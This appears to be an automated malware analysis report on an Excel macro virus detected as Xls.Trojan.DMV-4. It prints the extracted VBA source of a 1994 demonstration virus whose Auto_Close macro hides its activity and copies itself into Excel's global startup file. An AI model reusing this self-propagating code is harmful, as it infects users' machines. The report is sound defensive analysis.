Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 daec39849d10397f…

MALICIOUS

Office (OLE)

Size: 61.0 KB
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 505bed7765b3628d1221f359eac7fa4e
SHA-1: bf2469321f7035bb88b69073a6603d39fa3f0cde
SHA-256: daec39849d10397ff6fb11776ee1b1c85f684c2c86d521fd31e3293948568f42
Risk Score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Xls.Trojan.DMV-4. It contains VBA macros, specifically an Auto_Close macro that runs when the workbook is closed in Excel. This macro attempts to infect the GLOBAL.XLM global macro file by copying a module named 'Sheet01' into it (creating GLOBAL.XLM in the Excel startup directory if it does not already exist), thereby propagating the macro virus.

Heuristics (3)

  • ClamAV: Xls.Trojan.DMV-4 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.DMV-4
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Auto_Close macro (severity: high, rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro present; it runs automatically when the workbook is closed

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4320 bytes
SHA-256: 94f7cff5a4ac7b1a9599a64ec88d87837bd378c16652627d10b10f8bb8196e78
Detection: ClamAV: Xls.Trojan.DMV-4
Obfuscation or payload: unlikely

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Sheet01"

' Excel Auto_Close DMV
' 12/27/94 by joelm@eskimo.com
'
' This is a quick and dirty demonstration of a DMV running under
' Microsoft Excel 5.0.  It demonstrates the security risks of
' automatic macros.
'
' The code executes when Excel closes.  It infects the global macro file.
' No data files are infected, although it would be possible to add
' additional VBA code to do so (ala the Word DMV.DOC file).

Sub Auto_Close()
Attribute Auto_Close.VB_Description = "Macro recorded 12/27/94 by joelm"
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n0"

'this is the virus propogation code that infects GLOBAL.XLM

'for testing if GLOBAL.XLM and virus are already present
globalPresent = 0
virusPresent = 0

'turn screen updating off so the results can't be seen by the user
Application.ScreenUpdating = False
For x = 1 To Application.Workbooks.Count
    'is a GLOBAL.XLM file present?
    If Application.Workbooks(x).Name = "GLOBAL.XLM" Then
        'it exists
        globalPresent = 1
        'now see if the macro virus has already been installed
        For y = 1 To Application.Workbooks("GLOBAL.XLM").Modules.Count
            'the module with the virus is given an innocent looking
            'name that blends in with the other sheets
            If Application.Workbooks("GLOBAL.XLM").Modules(y).Name = "Sheet01" Then
                virusPresent = 1
                MsgBox "Virus already installed in GLOBAL.XLM"
            End If
        Next
        
        'GLOBAL.XLM exists, but the virus hasn't been installed, so install
        'it from this file
        If virusPresent = 0 Then
            'make it visible - this is required before a copy
            Windows("GLOBAL.XLM").Visible = True
            'copy this module into it
            MsgBox "GLOBAL.XLM exists.  Adding Auto_Close virus to it."
            Application.Workbooks("DMV.XLS").Modules("Sheet01").Copy after:=Application.Workbooks("GLOBAL.XLM").Modules(1)
            'make it invisible again
            Windows("GLOBAL.XLM").Visible = False
            'save it
            Application.Workbooks("GLOBAL.XLM").Save
        End If
    End If
Next
    'GLOBAL.XLM doesn't exist, so create one and save macro to
    If globalPresent = 0 Then
        newname$ = ActiveWorkbook.Name
        MsgBox "GLOBAL.XLM doesn't exist.  Creating it now."
        'copy the module into the startup directory
        Application.Workbooks(newname$).SaveCopyAs Application.StartupPath + "\GLOBAL.XLM"
        'now we need to open it up and make it visible
        Application.Workbooks.Open (Application.StartupPath + "\GLOBAL.XLM")
        Windows("GLOBAL.XLM").Visible = False
        'save the change
        Application.Workbooks("GLOBAL.XLM").Save
    End If
    
'turn screen updating back on
Application.ScreenUpdating = True
    
MsgBox "The virus has been spread.  Now execute some other code, for example..."

'this is the code that executes after the virus is spread, some malicious
'examples that use simple VB properties are shown

orgName = Application.OrganizationName
MsgBox ("Just checked which organization Excel was registered to..." + Chr(10) + Chr(10) + "A DMV could selectively target a business, government agency, or organization.  For example, delete all files if this software was licensed to IBM.")

useName = Application.UserName
MsgBox "Just checked who Excel was registered to..." + Chr(10) + Chr(10) + "A DMV could selectively target a specific individual for revenge or eavesdropping."

theCountry = Application.International(xlCountryCode)
MsgBox "Just checked Excel's country code..." + Chr(10) + Chr(10) + "A DMV could selectively target users within a certain country.  For example, overwrite files if an Arabic version of Excel was running."

theDate = Date
MsgBox "Just checked the date..." + Chr(10) + Chr(10) + "A DMV could serve as a time bomb.  For example, start renaming files after September 1995, so it appears problems are related to the release of Microsoft
... (truncated)